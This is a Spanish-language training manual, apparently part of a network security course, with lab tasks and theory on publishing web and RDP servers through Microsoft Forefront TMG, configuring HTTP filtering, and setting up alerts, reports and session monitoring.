 Entender la importancia de la publicación de los servidores.

 Configurando la Publicación y seguridad de un Servidor
Web.
 Configurando la Publicación de servidores que no son
WEB.
"Vive tratando de realizar muchas de las cosas que siempre has

soñado, y no te quedará tiempo para sentirte mal"
Richard Bach

capacidad.
siguientes:
 MS office.
 Entender la importancia de la publicación de los servidores.

 Configurando la Publicación y seguridad de un Servidor Web.
 Configurando la Publicación de servidores que no son WEB.
TAREA PRÁCTICA:
Configurando la Publicación y seguridad de un Servidor Web.

Para realizar esta tarea, partirá de la tarea 04 realizada anteriormente:
Realizará, paso a paso, el proceso de publicación del servidor WEB de la zona

DMZ.
Los pasos a seguir son los siguientes:
1. Verificará si se mantienen las configuraciones siguientes:
a. RED Interna:
 172.31.2.0/23, Gateway: 172.31.2.1/23.
 DNS:
 200.48.225.130
 200.48.225.146
b. RED DMZ:
 IP del servidor: 192.168.5.2/24
 Servicios: WEB.
 Gateway : 192.168.5.1/24
c. RED Externa:
 192.168.1.0/24
 Gateway: 192.168.1.0
 DNS:
 200.48.225.130
 200.48.225.146

2. Ingresará al servidor WEB.

3. Instalará el IIS y creará un sitio WEB, para lo cual puede ayudarse de
plantillas, siendo un sitio web que permite descargar plantillas gratuitas
muy buenas: http://www.misplantillas.com/plantillas-web-gratis.
4. Ahora, publicará el servidor WEB ubicado en la DMZ para que pueda ser
visto desde Internet:
5. Hará clic en Tareas, luego en “Publicar sitios WEB”:
6. Asignará un nombre a esta regla:
7. Seleccionará la acción de la regla, que en este caso será: “Permitir”:
8. Escogerá el tipo de publicación:

9. La seguridad de conexión de servidor, en esta ocasión lo definiremos

con la opción mostrada en la imagen:
10. Indicará los detalles internos de la publicación:
11. En la siguiente ventana se dejan las configuraciones por defecto.

12. Indicamos que se acepte cualquier nombre de dominio.

13. Ahora creará una nueva “Escucha WEB” y le asignará un nombre:
14. Por ahora indicamos que no es necesaria la conexión segura utilizando

SSL.
15. Indicará que se hará la escucha WEB de solicitudes WEB entrantes en
la red Externa.
16. Para el acceso no se requerirá autenticación:

17. Luego se mostrará la información ingresada:
18. La delegación de la autenticación será:

Sin delegación, pero el cliente se puede autenticar directamente:
19. Ahora, se ubicará en la directiva de firewall recién creada, en la ficha

“Escucha”.
20. Hará clic en “Propiedades”:
21. Luego seleccionará la casilla de verificación “Permitir la autenticación de

cliente a través de HTTP.

22. Ahora, comprobará que desde una PC con la dirección IP de la red

Externa (Internet) podrá acceder al servidor WEB DMZ.
Configurando la Publicación de servidores que no son WEB.
En este caso permitirá que desde la red externa se conecten al servidor DMZ vía
RDP.
Para esto debe seguir los pasos que a continuación se detallan:
1. Dirigirse al servidor TMG.
2. Crear una nueva directiva de tipo “Regla de publicación de protocolo de
servidor no WEB…”

3. Asigne un nombre a la regla.

4. Debe indicar el IP del servidor que publica:
5. Escogerá el protocolo deseado:
6. Indicará las direcciones IP de escucha, en este caso será la red externa:
7. Finaliza la creación de la regla.

8. Aplica los cambios:
9. En el servidor publicado, habilitará el acceso a escritorio remoto:

Se habilitará el escritorio
remoto para que se pueda
acceder a este equipo.
10. Ahora, compruebe, accediendo desde una pc que se encuentre en la red

externa, a través de Conexión a escritorio remoto, el acceso al servidor
publicado:
11. Verifique el acceso al servidor publicado:

FUNDAMENTO TEORICO:
Entender la importancia de la publicación de los servidores.
La publicación de un servidor, consiste en que ese servidor pueda ser visto
desde una red pública, siendo la red pública más común, Internet.
Configurando la Publicación y seguridad de un Servidor Web.

Los servidores que se publican en su gran mayoría son Servidores WEB, siendo
el procedimiento para la publicación de estos servidores, el siguiente:
 Publicar servidores web a través de HTTP: Se puede publicar un sitio web

único o un equilibrador de carga, varios sitios web o una granja de servidores
a través de HTTP.
Para publicar un solo sitio web o equilibrio de carga a través de HTTP se
realiza el siguiente procedimiento:
o En el árbol de la consola de administración de Forefront TMG, haga clic
en el nodo Directiva de firewall.
o En el panel Tareas, haga clic en la ficha Herramientas.
o En la ficha Herramientas, haga clic en Objetos de red, en Nuevo y después
seleccione Escucha de web para abrir el Asistente para nueva escucha
de web.
o completará el Asistente para nueva escucha de web.
o En el panel Tareas, haga clic en la ficha Tareas.
o En la ficha Tareas, haga clic en Publicar sitios web para abrir el Asistente
para nueva regla de publicación de web.
o Completará el Asistente para nueva regla de publicación de web.
o En el panel de detalles, haga clic en Aplicar y luego en Aceptar.
 Para publicar una granja de servidores a través de HTTP: Para realizar este
procedimiento debe realizar los pasos que a continuación se describen:

o En el árbol de la consola de administración de Forefront TMG, haga clic

o En el panel Tareas, haga clic en la ficha Herramientas.
o En la ficha Herramientas, haga clic en Objetos de red, haga clic en Nuevo
y, a continuación, seleccione Granja de servidores.
o Completará la configuración solicitada por el Asistente para nueva granja
de servidores.
o Si aparece un cuadro de mensaje en el que se indica que va a habilitarse
la regla de directiva de sistema Permitir solicitudes HTTP/HTTPS de
Forefront TMG a servidores seleccionados para los comprobadores de
conectividad, haga clic en Aceptar.
o En la ficha Herramientas, haga clic en Objetos de red, en Nuevo y después
seleccione Escucha de web para abrir el Asistente para nueva escucha
de web.
o Completará el Asistente para nueva escucha de web.
o En el panel Tareas, haga clic en la ficha Tareas.
o En la ficha Tareas, haga clic en Publicar sitios web para abrir el Asistente
para nueva regla de publicación de web.
o Completar el Asistente para nueva regla de publicación de web.
o En el panel de detalles, haga clic en Aplicar y luego en Aceptar.
 Publicar servidores web a través de HTTPS: Se puede publicar un sitio web

único o un equilibrador de carga, varios sitios web o una granja de servidores
a través de HTTPS.
o Para publicar un solo sitio web o equilibrio de carga a través de HTTPS,
se deben realizar los siguientes pasos:
 En el árbol de la consola de administración de Forefront TMG, haga clic
 En el panel Tareas, haga clic en la ficha Herramientas.
 En la ficha Herramientas, haga clic en Objetos de red, en Nuevo y
después seleccione Escucha de web para abrir el Asistente para nueva
escucha de web.
 Completará el Asistente para nueva escucha de web.
 En el panel Tareas, haga clic en la ficha Tareas.
 En la ficha Tareas, haga clic en Publicar sitios web para abrir el
Asistente para nueva regla de publicación de web.
 Completará el Asistente para nueva regla de publicación de web.
 En el panel de detalles, haga clic en Aplicar y luego en Aceptar.
o Para publicar una granja de servidores a través de HTTPS, se deben
realizar los siguientes pasos:


 En el panel Tareas, haga clic en la ficha Herramientas.
 En la ficha Herramientas, haga clic en Objetos de red, haga clic en
Nuevo y, a continuación, seleccione Granja de servidores.
 Completará el Asistente para nueva granja de servidores.
 Si aparece un cuadro de mensaje en el que se indica que va a
habilitarse la regla de directiva de sistema Permitir solicitudes
HTTP/HTTPS de Forefront TMG a servidores seleccionados para los
comprobadores de conectividad, haga clic en Aceptar.
 En la ficha Herramientas, haga clic en Objetos de red, en Nuevo y
después seleccione Escucha de web para abrir el Asistente para nueva
escucha de web.
 Completará el Asistente para nueva escucha de web.
 En el panel Tareas, haga clic en la ficha Tareas.
 En la ficha Tareas, haga clic en Publicar sitios web para abrir el
Asistente para nueva regla de publicación de web.
 Completar el Asistente para nueva regla de publicación de web.
o Para usar la autenticación de certificado de cliente para publicar a través
de HTTPS, se deben realizar los siguientes pasos:
 En el panel de detalles, haga clic en la regla de publicación de web
correspondiente.
 En la ficha Tareas, haga clic en Editar regla seleccionada.
 En la ficha Escucha, haga clic en Propiedades.
 En la ficha Conexiones, compruebe que Habilitar conexiones SSL
(HTTP) en el puerto esté seleccionado.
 Si no desea permitir conexiones HTTP sin autenticación de certificado
de cliente, compruebe que Habilitar conexiones HTTP en el puerto no
esté seleccionado.
 En la ficha Autenticación, realice una de las acciones siguientes:
 Si Método que los clientes usan para autenticarse en Forefront
TMG está establecido en Autenticación HTTP o Sin autenticación,
seleccione Autenticación de certificados SSL de cliente en la lista
desplegable y haga clic en Opciones avanzadas.
 Si Método que los clientes usan para autenticarse en Forefront
TMG está establecido en Autenticación de formularios HTML, haga
clic en Opciones avanzadas. Debe seleccionar Requerir certificado

SSL de cliente solo si desea exigir que en la solicitud HTTPS se

envíe un certificado SSL de cliente antes de que se presente el
formulario HTML al usuario.
 En la ficha Lista de confianza de certificados de cliente, seleccione una
de las opciones siguientes:
 Aceptar cualquier certificado de cliente en el que confíe el equipo
de Forefront TMG. Seleccione esta opción si desea que la lista de
entidades de certificación aceptables incluya todas las entidades
cuyo certificado raíz esté instalado en el almacén Entidades de
certificación raíz de confianza del equipo de Forefront TMG.
 Aceptar únicamente certificados emitidos por las entidades de
certificación seleccionadas a continuación. Seleccione esta opción
si desea limitar la lista de entidades de certificación cuyos
certificados se considerarán de confianza.
 En la ficha Restricciones de certificado de cliente, defina las
restricciones con las que deben coincidir los certificados SSL de cliente.
 Haga clic en Aceptar para cerrar la página Opciones avanzadas de
autenticación.
 En la ficha Certificados, compruebe que haya seleccionado un
certificado de servidor SSL y, a continuación, haga clic en Aceptar.
 Para la autenticación basada en formularios, en la ficha Tráfico,
seleccione Requerir certificado SSL de cliente.
 Haga clic en Aceptar.
o Para configurar el inicio de sesión único, debe realizar los siguientes
pasos:
 En el panel Tareas, haga clic en la regla de publicación de web
correspondiente.
 En la ficha Autenticación, compruebe que Método que los clientes usan
para autenticarse en Forefront TMG esté definido en Autenticación de
formularios HTML.
 En la ficha SSO, seleccione Habilitar inicio de sesión único.
 En Especificar los dominios de inicio de sesión único para esta escucha
de web, realice los pasos siguientes para los sitios web en los que
desee permitir el inicio de sesión único (SSO):
 Haga clic en Agregar.

 Escriba el dominio SSO para dos o más sitios web.

o Para configurar la traducción de vínculos, debe realizar los siguientes
pasos:
 En el panel de tareas, haga clic en la regla de publicación de web
correspondiente.
 En la ficha Traducción de vínculos, seleccione Aplicar traducción de
vínculos a esta regla.
 Si desea que se traduzcan los vínculos de páginas web que contengan
otros juegos de caracteres, seleccione Aplicar también traducción de
vínculos al contenido web que use este juego de caracteres y, a
continuación, seleccione un juego de caracteres en la lista desplegable.
 Para configurar asignaciones locales, haga clic en Configurar y, a
continuación, realice los pasos siguientes para cada asignación local
que desee agregar a la regla de publicación de web seleccionada:
 En Reemplazar este texto, escriba una dirección URL que contenga
un nombre de host interno (o una dirección IP).
 En Con este texto, escriba una dirección URL que contenga un
nombre de host que se pueda resolver públicamente (o una
dirección IP).
 Haga clic en Aceptar.
 Haga clic en Aceptar y luego de nuevo en Aceptar.
 Repita los pasos del 2 al 7 para otras reglas de publicación de web en
las que desee configurar opciones de traducción de vínculos
específicas.
 En la ficha Tareas, haga clic en Configurar opciones de traducción
global de vínculos.
 En la ficha General, compruebe que Habilitar la traducción de vínculos
esté seleccionado.
 En la ficha Asignaciones globales, realice los pasos siguientes para
cada asignación global que desee agregar:
 En el campo Dirección URL interna, escriba una dirección URL que
contenga un nombre de host interno (o una dirección IP).

 En el campo Dirección URL traducida, escriba una dirección URL

que contenga un nombre de host que se pueda resolver
públicamente (o una dirección IP).
 Haga clic en Aceptar.
 Para habilitar y configurar el redireccionamiento de vínculos en sitios
internos no publicados, en la ficha Redireccionamiento de vínculo, haga
lo siguiente:
 Seleccione Redirigir usuarios que vayan a estos sitios no
publicados.
 Haga clic en Agregar para agregar o crear un conjunto de
direcciones URL que contenga las direcciones URL internas de los
sitios no publicados.
 En Redirigir usuarios a esta dirección URL publicada, especifique
la dirección URL a la que se debe redirigir a los usuarios cuando
utilicen vínculos que apunten a uno de los sitios publicados.
 Para configurar tipos de contenido, en la ficha Tipos de contenido, en
Tipos de contenido seleccionados, seleccione uno o más tipos de
contenido.
 Haga clic en Aceptar y luego de nuevo en Aceptar.
o Para configurar el cierre de sesión seguro, se deben realizar los siguientes
pasos:
 En el panel de detalles, haga clic en la regla de publicación de web
correspondiente que utiliza autenticación basada en formularios HTML.
 En la ficha Configuración de aplicaciones, en el campo Dirección URL
de cierre de sesión de servidor publicado, escriba la cadena que se
utiliza en el vínculo de cierre de sesión de la página web publicada para
indicar una solicitud de cierre de sesión; por ejemplo, ?Cmd=logoff, o
logoff=1.
 En la ficha Formularios, haga clic en Opciones avanzadas.
 En Configuración de cookies puede proporcionar un nombre para la
cookie que Forefront TMG proporciona al cliente cuando la
autenticación basada en formularios es correcta. En la lista desplegable
puede seleccionar si las cookies son permanentes (siguen presentes

en el cliente tras el final de la sesión) en todos los equipos, sólo en

equipos privados o nunca.
 En Omitir la dirección IP del explorador para la comprobación de
cookies, defina si desea permitir que los clientes utilicen la misma
cookie desde distintas direcciones IP. Por ejemplo, puede parecer que
las solicitudes de un único cliente proceden de distintas direcciones IP,
como cuando existe un equilibrio de carga entre Forefront TMG y el
cliente.
 En Configuración de seguridad del cliente, seleccione:
 Considerar como tiempo máximo de inactividad, para establecer un
período de espera según el tiempo que el cliente permanezca
inactivo.
 Considerar como duración máxima de la sesión, para establecer un
período de espera según la duración de la sesión. A continuación,
especifique los períodos de espera para los equipos públicos y
privados, que se utilizará para establecer el tiempo máximo de
inactividad o la duración máxima de la sesión.
 Aplicar tiempo de espera de sesión a clientes no de explorador,
para aplicar el período de espera a los clientes que no estén
basados en explorador (como Outlook RPC/HTTP o ActiveSync).
 Haga clic en Aceptar, haga clic de nuevo en Aceptar y vuelva a hacer
clic en Aceptar.
 En el panel de detalles, haga clic en el botón Aplicar para guardar y
actualizar la configuración, y luego en Aceptar.
o Para configurar certificados de servidor para la publicación de web segura,
al publicar servidores web u Outlook Web Access, Forefront TMG utiliza
los certificados de la forma siguiente:
 Protocolo puente de HTTPS a HTTP.
 Protocolo puente de HTTPS a HTTPS.
Configurando la Publicación de servidores que no son WEB.
Teniendo en cuenta lo indicado por Microsoft, en Technet, cuando se publican
servidores diferentes al servidor web, Forefront TMG usa reglas de publicación
de servidor para permitir las solicitudes realizadas a servidores en una red
protegida por Forefront TMG, siendo estas solicitudes procedentes de clientes
ubicados en otras redes. Los clientes pueden ser clientes externos ubicados en
Internet o clientes internos ubicados en una red interna diferente.
Al publicar un servidor no web, tenga en cuenta lo siguiente:
 El servidor publicado puede configurarse como cliente SecureNAT con
una puerta de enlace predeterminada que señale a Forefront TMG.

 No se pueden autenticar las solicitudes de usuario para los servidores no

web.
 Puede utilizar las direcciones IP para especificar quién puede tener
acceso a recursos publicados.
 La publicación de un servidor configura Forefront TMG para escuchar en
un puerto específico y enviar las solicitudes al servidor publicado.
Veremos las diferentes formas de crear las reglas de publicación No WEB en los
servidores:
 Para crear y utilizar un protocolo de servidor, realizaremos los pasos

siguientes:
o En el árbol de la consola de administración de Forefront TMG, haga
clic en el nodo Directiva de firewall.
o En el panel de Tareas, en la ficha Herramientas, haga clic en
Protocolos.
o En la barra de herramientas que hay debajo de Protocolos, haga
clic en Nuevo y, después, en Protocolo.
o Completará el Asistente para nueva definición de protocolos.
o En el panel de tareas, en la ficha Tareas, haga clic en Publicar
protocolos de servidor no web para abrir el Asistente para nueva
regla de publicación de servidor.
o Finalizar el Asistente para nueva regla de publicación de servidor.
o En el panel de detalles, haga clic en el botón Aplicar para guardar
y actualizar la configuración, y luego en Aceptar.
 Para publicar un servidor FTP, debe realizar el siguiente procedimiento:
o En el panel Tareas, en la pestaña Tareas, haga clic en Publicar
o Complete el Asistente para nueva regla de publicación de servidor.
o Si desea habilitar las descargas FTP, siga los siguientes pasos:
 En el panel de detalles, haga clic con el botón secundario
sobre el nombre de la regla que acaba de crear.
 Haga clic en Configurar FTP.
 En la página Configurar directiva de protocolo FTP,
desactive Solo lectura.

 Para publicar un equipo SQL Server, se deben ejecutar los siguientes

pasos:
o En el panel Tareas, en la ficha Tareas, haga clic en Publicar
 Para publicar un servidor RDP, se deben tomar en cuenta los siguientes
pasos:
o En el panel Tareas, en la ficha Tareas, haga clic en Publicar
o Si desea que el Forefront TMG sólo permita a equipos específicos
de Internet conectarse al servidor RDP publicado, siga estos
pasos:
 En el panel de detalles, seleccione la regla que acaba de
crear.
 En la ficha De, haga clic en cualquier lugar y, a continuación,
en Quitar.
 Haga clic en Agregar, en Nuevo y, a continuación, en
Conjunto de equipos.
 Escriba un nombre para el nuevo conjunto de equipos y
agregue al conjunto de equipos los equipos que podrán
conectarse al servidor RDP.
 En la página Agregar entidades de red, seleccione el
conjunto de equipos que ha creado, haga clic en Agregar y,
a continuación, en Cerrar.

1. ¿Cuál es el objetivo de publicar servidores en la red de datos de la

empresa?
2. ¿Qué servidores normalmente son publicados en una empresa?.
3. ¿Qué ventajas nos trae el uso de una zona DMZ en la red de datos de la
empresa?.
4. Al publicar servidores, se aumenta el riesgo de tener problemas de
seguridad, explique las causas y las posibles soluciones.


TAREA
08
Tarea 08: Realizar la Configuración Avanzada de Filtros.
En esta tarea realizará las siguientes operaciones:
Aplicaciones avanzadas y Descripción de Filtro Web.

Configurando Filtro Web http.
Una máquina puede hacer el trabajo de cincuenta hombres

corrientes, pero no existe máquina que pueda hacer el trabajo de
un hombre extraordinario.
(Elbert Green Hubbard)

capacidad.
siguientes:
 Aplicaciones avanzadas y Descripción de Filtro Web.

 Configurando Filtro Web http.
Operación:
TAREA PRÁCTICA
Para realizar esta tarea, ejecute los siguientes pasos:
1. Haga clic secundario en la directiva de firewall utilizada.
2. Haga clic en “Configurar HTTP”.

3. Aparecerá la ventana “Configurar Directiva HTTP para la regla”:
4. El bloqueo de archivos ejecutables (.exe) es un uso típico del bloqueo de

extensiones.
5. Para esto, haga clic en la ficha “Extensiones”:

6. En la opción “Especificar la acción

realizada para extensiones de
archivo” escogerá: “Bloquear
extensiones especificadas
(permitir las demás).
7. Haga clic en agregar.
8. Agregue la extensión “.exe”:
9. Haga clic en aceptar.

10. Luego nuevamente haga clic en aceptar y listo.
11. Aplique los cambios:

FUNDAMENTO TEORICO:
Puede utilizar un filtro HTTP en las reglas de acceso entrantes y salientes para
controlar los tipos de datos que puedan atravesar el firewall.
Forefront TMG nos brinda un control muy preciso del tráfico HTTP en forma de
filtros HTTP. Este filtro HTTP que trabaja en la capa de aplicación, examina los
comandos y los datos HTTP que pasan por el firewall, admitiendo solo el paso
de las solicitudes que cumplan los requisitos, además se puede controlar el
acceso a Internet del cliente.
El filtrado HTTP se puede aplicar en los siguientes entornos:
 Cuando los clientes de la red interna tienen acceso a objetos HTTP

(páginas HTML, imágenes u otros datos que se pueden transferir
utilizando el protocolo HTTP) en otra red, como por ejemplo Internet, a
través del equipo de Forefront TMG.
 Cuando los clientes de la red externa tienen acceso a objetos HTTP en

un servidor web que se publica a través del servidor de Forefront TMG.
Para configurar el filtrado HTTP en una regla de acceso, se deben considerar los
pasos siguientes:
 Obtener acceso a la regla en la que se configura el filtrado HTTP: Esto se

logra de la siguiente manera:
o En el panel de detalles, haga clic con el botón secundario en la
regla que desea modificar y, a continuación, haga clic en
Configurar HTTP. Se abre el cuadro de diálogo Configurar directiva
HTTP para la regla.
o Configure el filtrado HTTP según los requerimientos indicados.
 Configurar el bloqueo de encabezados y de direcciones URL: Esto se

logra realizando los siguientes pasos:

o Haga clic en la ficha General en el cuadro de diálogo Configurar

directiva HTTP para la regla.
o En Longitud máxima de encabezados (bytes), especifique el
número máximo de bytes permitidos en la dirección URL y el
encabezado HTTP de una solicitud HTTP antes de que se bloquee.
o Desactive Permitir cualquier longitud de carga para bloquear las
solicitudes que superen el número de bytes especificado en
Longitud máxima de carga (bytes).
o En Longitud máxima de dirección URL (bytes), escriba la longitud
máxima permitida de dirección URL. Las solicitudes con
direcciones URL que superen este valor se bloquearán.
o En Longitud máxima de consulta (bytes), escriba la longitud
máxima de las consultas permitida en las solicitudes. Las
solicitudes con consultas que superen este valor se bloquearán.
o Seleccione Comprobar normalización para bloquear las solicitudes
que contengan direcciones URL con caracteres de escape tras la
normalización.
o Seleccione Bloquear caracteres ASCII de 8 bits para especificar
que se bloquearán las direcciones URL con caracteres ASCII de 8
bits.
o Seleccione Bloquear respuestas que incluyan contenido ejecutable
de Windows para especificar el bloqueo de las respuestas que
contengan contenido ejecutable de Windows (respuestas que
empiecen por MZ).
 Configurar métodos HTTP (verbos HTTP): Para la configuración de estos

métodos, tenemos que seguir los siguientes pasos:
o Haga clic en la ficha Métodos en el cuadro de diálogo Configurar
o En Especificar la acción que se realiza para métodos HTTP,
seleccione la acción que se debe realizar para los métodos de la
lista. Es posible permitir todos los métodos, bloquear los de la lista
y admitir todos los demás, o permitir los de la lista y bloquear los
demás. Se recomienda que solo permita los métodos
seleccionados, ya que es la configuración más segura.
o Para agregar un método, haga clic en Agregar. En el cuadro de
diálogo Método, escriba el método que desee agregar.

o Para eliminar un método existente, seleccione el método en la lista

y, a continuación, haga clic en Quitar.
o Para editar un método existente, seleccione el método en la lista y,
a continuación, haga clic en Editar.
 Configurar el bloqueo de extensiones HTTP: Esto se logra de la siguiente

forma:
o Haga clic en la ficha Extensiones en el cuadro de diálogo
Configurar directiva HTTP para la regla.
o En Especificar la acción realizada para extensiones de archivo,
seleccione una acción.
o Active Bloquear solicitudes que contengan extensiones ambiguas
para bloquear las solicitudes que tengan extensiones que no se
puedan determinar.
o Para agregar una extensión, haga clic en Agregar. En el cuadro de
diálogo Extensión, escriba la extensión que desee agregar.
o Para editar una extensión existente, selecciónela en la lista y, a
continuación, haga clic en Editar.
o Para eliminar una extensión existente, selecciónela en la lista y, a
continuación, haga clic en Quitar.
 Configurar el bloqueo de encabezados: Esto se realiza cumpliendo las

siguientes indicaciones:
o Haga clic en la ficha Encabezados en el cuadro de diálogo
Configurar directiva HTTP para la regla.
o Haga clic en Agregar para agregar un encabezado que deba
bloquearse. A continuación, en el cuadro de diálogo Encabezado,
seleccione Solicitar encabezados y escriba el nombre del
encabezado. Se permiten todos los encabezados excepto los que
aparecen en la lista Permitir todos los encabezados.
o Para editar un encabezado, selecciónelo en la lista y, a
continuación, haga clic en Editar. Para permitir un encabezado que
se encuentra en la lista de bloqueados, selecciónelo y, a
o En Encabezado de servidor, especifique cómo se devolverá el
encabezado de servidor en la respuesta. El encabezado de
servidor es un encabezado de respuesta que contiene información

como el nombre de la aplicación de servidor y la versión de

software
o En Encabezado de vía, especifique cómo se reenviará el
encabezado de vía en la solicitud o cómo se devolverá en la
respuesta.
 Configurar firmas bloqueadas: Estos filtros son de gran importancia, ya

que pueden especificar si desea permitir o bloquear las solicitudes, en
función de firmas específicas en los encabezados o en el cuerpo.
Para realizar este tipo de filtrado, ejecute los pasos siguientes:
o Haga clic en la ficha Firmas en el cuadro de diálogo Configurar
o Haga clic en Agregar para agregar una firma bloqueada. A
continuación, en el cuadro de diálogo Firma, especifique lo
siguiente:
 En Buscar en, especifique si la firma aparece en el cuerpo o
encabezado de la dirección URL de solicitud o en el cuerpo
o encabezado de la respuesta.
 En Encabezado HTTP, escriba el nombre del encabezado,
si ha especificado una firma de tipo de encabezado.
 En Firma, escriba la cadena de firmas. Una firma puede ser
cualquier cadena de un encabezado o cuerpo. Se
recomienda seleccionar cadenas que sean lo
suficientemente específicas para bloquear únicamente las
solicitudes o respuestas que desea bloquear.
 En Intervalo de bytes, especifique los valores De y A, si ha
seleccionado Cuerpo de la respuesta o Solicitar cuerpo
como tipo de firma. De forma predeterminada, el Forefront
TMG sólo analiza los 100 primeros bytes del cuerpo de la
solicitud y la respuesta. Si aumenta este valor
predeterminado, el rendimiento del sistema podría verse
afectado.
o Puede habilitar o deshabilitar las firmas usando las casillas de
verificación situadas junto a sus nombres. Haga clic en Mostrar sólo
cadenas de búsqueda habilitadas para ver únicamente las firmas
habilitadas.

o Para modificar una firma bloqueada, selecciónela en la lista

Bloquear contenido que contenga estas firmas y, a continuación,
haga clic en Editar.
o Para admitir una firma bloqueada, selecciónela en la lista Bloquear
contenido que contenga estas firmas y, a continuación, haga clic
en Quitar.
 Determinar firmas: Puede determinar una firma para que bloquee tráfico
específico mediante la supervisión del tráfico de red.
1. ¿Qué medidas tomaría para implementar una óptima navegación WEB en

una empresa?.
2. ¿Qué entiende usted por filtro WEB? – Explique.
3. ¿En la empresa en la cual está usted realizando sus estudios de
complementación práctica, tienen directivas de acceso y filtros WEB? –
Explique.

TAREA
09
Tarea 09: Configurar la Supervisión y los informes utilizando el servidor
Firewall de Microsoft.
Configurando Alertas.
Configurando la Supervisión de sesiones.
Configurando reportes.
Supervisando la conectividad.
Supervisando Servicios y Rendimiento.
“La confianza en sí mismo es el primer paso para el éxito“.

Anónimo

capacidad.
 Software para virtualizar equipos.
 Sistema operativo Windows server.
 Sistema operativo Windows para el equipo cliente.
 Configurando Alertas.
 Configurando la Supervisión de sesiones.
 Configurando reportes.
 Supervisando la conectividad.
 Supervisando Servicios y Rendimiento.
TAREA PRÁCTICA
Configurando Alertas:
Para crear una nueva alerta, realice el siguiente procedimiento:
1. Ubiquese en la opción “Supervisión”
2. Ubiquese en la ficha “Alertas”:
3. En el panel de tareas al lado

derecho, haga clic en “Configurar
definiciones de alerta”.
4. Aparecerá el siguiente conjunto de
alertas: existentes:
5. Haga clic en “Agregar…”.
6. Se le asignará un nombre a la
nueva alerta:

7. Indicará el evento que desencadenará la alerta:
8. Seleccione el servidor que debe desencadenar la alerta:
9. Indicará la categoría y la gravedad:
10. Indique las acciones a realizar en caso de presentarse una alarma del tipo
que se está definiendo:

11. Se indicarán los datos del servidor y la cuenta de correo electrónica.
12. Hará clic en “Finalizar” y luego aplicará los cambios.
Configurando reportes.
Para crear un nuevo reporte o informe, realice el siguiente procedimiento:

1. Ubíquese en la consola de Forefront TMG Management, luego ubíquese

en el árbol de la consola y haga clic en el nodo Registros e informes.
2. En el panel de detalles, haga clic en la ficha Creación de informes.
3. En el panel Tareas, haga clic en el tipo de informe que desea crear.
4. Haga clic en “Crear trabajo de informe

periódico”.
5. Asignará un nombre a esta tarea:
6. Programará la frecuencia con la que se generará el informe:

7. Indicará que se incluirá en el informe:
8. Indicará la ruta en la cual se publicarán y guardarán los informes:
9. Finalizará y luego aplicará los cambios.

FUNDAMENTO TEORICO:
Configurando Alertas.
Después de la instalación de Forefront TMG, se configuran una serie de alertas
que se encuentran predefinidas. Cada alerta se ejecuta cuando se produce un
determinado evento de Forefront TMG. Es posible habilitar o deshabilitar las
alertas, modificar la forma en que se desencadena la alerta, modificar la acción
que se realizará cuando se desencadena la alerta.
También se pueden definir alertas personalizadas adicionales.
El procedimiento para modificar una alerta, es el siguiente:
1. En el árbol de la consola de administración de Forefront TMG, haga clic
en el nodo Supervisión.
2. En el panel de detalles, haga clic en la ficha Alertas.
3. En el panel Tareas, haga clic en Configurar definiciones de alerta.
4. En la ficha Definiciones de alerta, seleccione la alerta que desee modificar
y, a continuación, haga clic en Editar.
5. En la ficha General, modifique el nombre, la categoría y la gravedad de la
alerta en función a las políticas de seguridad en la empresa.
6. En la ficha Eventos, especifique las veces que debe producirse un evento
para que se emita la alerta y cómo debe emitirse la alerta cuando se ha
alcanzado dicho número de veces.
7. En la ficha Acciones, especifique la acción que se genera cuando se emite
la alerta. De forma predeterminada, las alertas se notifican siempre en el
registro de eventos de Windows.
8. Si desea eliminar una definición de alerta de la lista que piensa que no es
necesaria, seleccione la alerta en la lista Definiciones de alerta y, a
El procedimiento para crear una alerta personalizada, es el siguiente:
en el nodo Supervisión.
2. En el panel de detalles, haga clic en la ficha Alertas.
3. En el panel Tareas, haga clic en Configurar definiciones de alerta.
4. En la lista Definiciones de alerta, haga clic en Agregar.
5. Finalice el Asistente para la configuración de nuevas alertas. Tenga en
cuenta las consideraciones siguientes:
a. En la página Eventos y condiciones, seleccione el evento que
desencadena la alerta y las condiciones adicionales.
b. En la página Servidor, deje el valor predeterminado “Cualquier
servidor”.

c. En la página Categoría y gravedad, clasifique la alerta.

d. En la ficha Acciones, especifique las acciones que se van a realizar
cuando se desencadena la alerta.
Configurando la Supervisión de sesiones.
La ficha Sesiones le permite supervisar las conexiones activas de un nombre de
usuario o equipo concreto en la red.
Para administrar una sesión se realizará el siguiente procedimiento:
en el nodo Supervisión. A continuación, haga clic en la ficha Sesiones.
2. En el panel de detalles, seleccione una sesión (cada sesión está
conformada de un nombre de usuario y la dirección IP de un equipo
cliente). Para cada sesión se muestran los siguientes datos:
a. Activación: fecha y hora en que se inició la sesión.
b. Nombre de servidor: el nombre del servidor Forefront TMG.
c. Tipo de sesión: puede supervisar conexiones de los siguientes
clientes Forefront TMG: clientes Forefront TMG, clientes
SecureNAT, clientes de red privada virtual (VPN), clientes de VPN
de sitio a sitio y clientes de proxy web.
d. IP de cliente: la dirección IP de origen del cliente.
e. Red de origen: la red donde se originó la sesión.
f. Nombre de usuario del cliente: el cliente autenticado por el
Forefront TMG cuando es necesaria la autenticación.
g. Nombre de host de cliente: para clientes Forefront TMG.
h. Nombre de aplicación: para clientes Forefront TMG. Este campo
no se muestra de forma predeterminada, se debe habilitar su
visualización.
3. Para desconectar una sesión, seleccione la entrada de sesión y haga clic
en Desconectar una sesión de la ficha Tareas. El desconectar una sesión
no impide que los clientes creen nuevas sesiones. Para ello, deberá crear
reglas de acceso que denieguen específicamente el acceso a clientes
específicos.
4. Tenga en cuenta las consideraciones siguientes, para la óptima
administración de las sesiones:
a. En la ficha Escritorio digital se muestra un resumen de las sesiones
para cada tipo de cliente.
b. Las sesiones de clientes proxy web tienen una sesión de cliente
SecureNAT correspondiente.
c. Las sesiones de clientes Forefront TMG tienen una sesión de
cliente SecureNAT correspondiente. Para cada equipo con cliente

Forefront TMG instalado, hay una sesión SecureNAT además de

una sesión cliente Forefront TMG.
d. Una conexión entre dos equipos a través de Forefront TMG sólo
puede pertenecer a una sola sesión.
e. Si no se requiere autenticación, todo el tráfico procedente de la
misma dirección IP se considera como una sola sesión. Por
ejemplo, un explorador web que abre más de una conexión TCP
con la misma dirección IP se considera como una sola sesión.
f. Las sesiones de clientes proxy web indican la actividad más
reciente del explorador web, aunque el cliente no esté realizando
ninguna exploración en este momento.
Administrar la supervisión de sesiones

Para administrar la supervisión de sesiones debe realizar el siguiente
procedimiento:
1. En el árbol de la consola de administración de Forefront TMG, haga clic en

el nodo Supervisión. A continuación, haga clic en la ficha Sesiones.
